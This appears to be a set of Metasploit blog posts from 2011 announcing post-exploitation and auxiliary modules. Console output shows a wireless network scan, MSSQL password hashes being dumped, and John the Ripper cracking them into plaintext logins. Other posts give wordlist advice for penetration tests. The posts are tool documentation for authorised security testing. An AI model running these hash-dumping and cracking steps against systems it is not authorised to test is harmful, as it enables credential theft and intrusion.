[*] {"GetLastError"=>0, "return"=>0, "ppWlanBssList"=>5282784}

[*] Number of Networks: 16

[+] SSID: horton

          BSSID: xx:xx:xx:xx:xx:xx 

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -90

          Signal: 16



[+] SSID: Skynet

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: 802.11n PHY type

          RSSI: -25

          Signal: 99



[+] SSID: WIN_930

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -89

          Signal: 18



[+] SSID: The Dragisic Network

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -86

          Signal: 23



[+] SSID: jacob1

          BSSID: xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -76

          Signal: 40



[+] SSID: WIN_BA74

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -78

          Signal: 36



[+] SSID: MonroeMFC

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -90

          Signal: 16



[+] SSID: starmonster

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -81

          Signal: 31



[+] SSID: Eric Home

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -87

          Signal: 21



[+] SSID: linksys

          BSSID:  xx:xx:xx:xx:xx:xx

          Type: Infrastructure

          PHY: High-rate DSSS (HRDSSS)

          RSSI: -74

          Signal: 43



[+] SSID: Tarheel_Country

          BSSID:  xx:xx:xx:xx:xx:xx 

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -72

          Signal: 46



[+] SSID: W32.Blaster.Worm

          BSSID:  xx:xx:xx:xx:xx:xx 

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -80

          Signal: 33



[+] SSID: Leidi

          BSSID:  xx:xx:xx:xx:xx:xx

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -88

          Signal: 20



[+] SSID: theriault

          BSSID:  xx:xx:xx:xx:xx:xx

          Type: Infrastructure

          PHY: 802.11n PHY type

          RSSI: -81

          Signal: 31



[+] SSID: EckerNet

          BSSID:  xx:xx:xx:xx:xx:xx 

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -75

          Signal: 41



[+] SSID: Belkin_G+MIMO_Wireless_E5A125

          BSSID:  xx:xx:xx:xx:xx:xx 

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -87

          Signal: 21



[*] WlanAPI Handle Closed Successfully

[*] Post module execution completed



wlan_disconnect: This module takes an integer as an argument. that Integer is the index of the interface you want

to target. Most machines will likely only have 1 wireless interface, and so this option can be left on the default

value of 0. The module will disconnect the specified wireless interface from whatever network it is currently

connected to. This will be more useful when the module to connect the interface to a specified network is



Database Hash dumping

There are some interesting new Auxiliary modules in the framework now too. These are hashdump modules for several

of the more popular database servers: MSSQL, MySQL, Postgres, and Oracle. The modules take supplied credentials

and log onto the databases on a given port across a supplied RHOSTS list. It will then attempt to dump all the

database user password hashes. If it succeeds, it will then store them in a csv as loot for further cracking.

These modules will also attempt to save all the database, table, and instance names from the database. It will

use these for wordlist building when attempting to crack the hashes.



msf  auxiliary(mssql_hashdump) > exploit



[*] Instance Name: "WINTEST2008"

[+] - Saving mssql05.hashes = sa:010051aa13a36f6efb5296ee8b804138173e0696d0892c52fcb6

[+] - Saving mssql05.hashes = ##MS_PolicyEventProcessingLogin##:010031b4ae8d43c66a1a17f5f5e7da86a1764dc48ddc6 babdd9e

[+] - Saving mssql05.hashes = ##MS_PolicyTsqlExecutionLogin##:010094044117b73bd4051b810dab0b7db5e3cbd8bb402c3 6ffe0

[+] - Saving mssql05.hashes = user1:01006dcfe5ee776f7fa8210a33c5bf2aaaef2b5ee25f315a2890

[+] - Saving mssql05.hashes = user2:0100acc65dd1643d5a43320af56bc37861e6ba4af7b9a0e866ee

[+] - Saving mssql05.hashes = user3:0100e838d7b99cedfb902161be09e3e859f2aca099f5eb49684b

[+] - Saving mssql05.hashes = user4:0100a9ec455822cb06dcb752390725649dbf669aa1994669a1ce

[+] - Saving mssql05.hashes = user5:0100a5a9092099814984bbbf0aa851477b5edbd1a5406ba1bebb

[+] - Saving mssql05.hashes = user6:01001d924e4d071f25849387181a2c1b0336b60baecf3e78b874

[+] - Saving mssql05.hashes = user7:01001e0a03d8f99fb1355ae09ebde36686f1041c072e4111f999

[+] - Saving mssql05.hashes = user8:0100c506c9b67d8592f9f36982c82f8907ac38258b1fe358a84c

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf  auxiliary(mssql_hashdump) >


Linux unshadow

The auxiliary/analyze/jtr_unshadow module is another new addition. This module exists for scenarios where you can

pull arbitrary files off victim machines in less standard ways, such as directory traversal attacks. It will take

paths to locally stored passwd and shadow files. It will then unshadow the passwd file and store it as loot for

future cracking.


New Password Cracking Options

Building on the success of our first John the Ripper(JtR) cracking module, we now have a few more. There are John the

Ripper modules for cracking Microsoft SQL Server, MySql, Oracle, and Linux hashes. It will look for the database

hashes in the loot files created by the previously mentioned hashdump modules. All of these modules

will assemble a wordlist based on a number of things:



  1. The default wordlist we ship with
  2. All usernames and passwords currently stored in the creds table
  3. All hostnames in the hosts table
  4. Any passwords already cracked by JtR (in the .pot file)
  5. Any captured MSSQL instance names
  6. Any database and table names gathered by db hashdump modules
  7. An optional user supplied wordlist


All of these items are pulled together, and uniqued to create a wordlist for cracking. It will then

attempt limited password cracking using these wordlists and some fast and easy cracking rules.

These modules are not a thorough cracking attempt, but rather an attempt to crack the quick and

easy hashes. any hashes that are successfully cracked are then stored as creds in the database.



msf  auxiliary(mssql_hashdump) > use auxiliary/analyze/jtr_mssql_fast

msf  auxiliary(jtr_mssql_fast) > exploit



[*] Cracking MSSQL Hashes

[*] Cracking MSSQL05 Hashes

[*] HashList: /tmp/jtrtmp20111205-10995-2yklnu-0

[*] Trying Wordlist: /tmp/jtrtmp20111205-10995-1s8wt88-0

guesses: 5  time: 0:00:01:20 DONE (Mon Dec  5 15:13:41 2011)  c/s: 3436K  trying: �tude1900

Use the "--show" option to display all of the cracked passwords reliably

[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])

[*] Output: WINTEST2008      (user6)

[*] Output: password2        (user2)

[*] Output: password2        (user1)

[*] Output: user3            (user3)

[*] Output: password8        (user8)

[*] Trying Rule: All4...

Warning: mixed-case charset, but the current hash type is case-insensitive;

some candidate passwords may be unnecessarily tried more than once.

guesses: 0  time: 0:00:02:05 DONE (Mon Dec  5 15:15:47 2011)  c/s: 3947K  trying: |||}

[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])

[*] Output: Remaining 6 password hashes with 6 different salts

[*] Trying Rule: Digits5...

guesses: 0  time: 0:00:00:00 DONE (Mon Dec  5 15:15:47 2011)  c/s: 2898K  trying: 89092

[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])

[*] Output: Remaining 6 password hashes with 6 different salts

[*] user1:password2:



[*] user2:password2:



[*] user3:user3:



[*] user6:WINTEST2008:



[*] user8:password8:






[*] 5 password hashes cracked, 6 left



[*] 5 hashes were cracked!

[+] Host: Port: 1055 User: user1 Pass: password2

[+] Host: Port: 1055 User: user2 Pass: password2

[+] Host: Port: 1055 User: user3 Pass: user3

[+] Host: Port: 1055 User: user6 Pass: WINTEST2008

[+] Host: Port: 1055 User: user8 Pass: password8

[*] Auxiliary module execution completed

msf  auxiliary(jtr_mssql_fast) >



One thing to note is that the jtr_linux module is not listed as fast mode. This is because this module

can be very slow depending on the type of Linux hashes it is trying to crack. If the hashes were created

using crypt(3) this module can be VERY slow.


There is also one other hash cracking module that does not use JtR. This is the postgres_md5_crack module.

JtR currently does not support Postgres md5 hashes. These hashes are create by taking the password and

appending the username before md5 hashing it. The postgres_md5_crack module generates a wordlist the same way

the JtR modules do. It then takes each word appends the username of the hash being tried, md5 hashes it and

compare against the hash. If it's a match it saves the discovered cred in the database. This module can actually

move surprisingly fast, but is not necessarily a thorough cracking method.


These are just some of the new features that have been added to the Metasploit Framework over the past month.

Stay tuned as there are sure to be even more great new features coming. If there is something that Metasploit

doesn't do, that you think it should, let us know. Better yet, try your hand at writing it yourself and send us

a Pull Request on Github! Cheers for now.

In any penetration test that involves brute forcing passwords, you may want to increase your chances of a successful password audit by adding custom wordlists specific to the organization that hired you. Some examples:


  • If you are security testing a hospital, you may want to add a dictionary with medical terms.
  • If you're testing a German organization, users are likely to use German passwords, so you should add a German wordlist.
  • Another good idea is to build a custom wordlist based on the organization's website (try the Worldlist Ruby gem to generate a wordlist based on a URL scrape).


Once you have a wordlist, you can easily add it to Metasploit. Here's a video to show you how:



Adding custom wordlists this way will work in Metasploit Express and Metasploit Pro. If you want to try it out, get your free Metasploit Pro trial today!


Metasploit and PTES

Posted by jcran Dec 2, 2011

One of our Metasploit contributers, Brandon Perry, has put together a document detailing the recently released Penetration Testing Execution Standard (PTES) with the modules and functionality in the Framework. PTES is a push from a group of testers fed up with the lack of guidance and the disparate sources of basic penetration testing information. Brandon's document does a great job detailing disparate parts of the framework in the context of PTES.


Hopefully Brandon will continue to build this document out, as it is a handy resource. This helps make the PTES guidance actionable, and is a good read whether you're just getting started or you're an old hand with the framework.


Have a look at the document here.

Filter Blog

By date: By tag: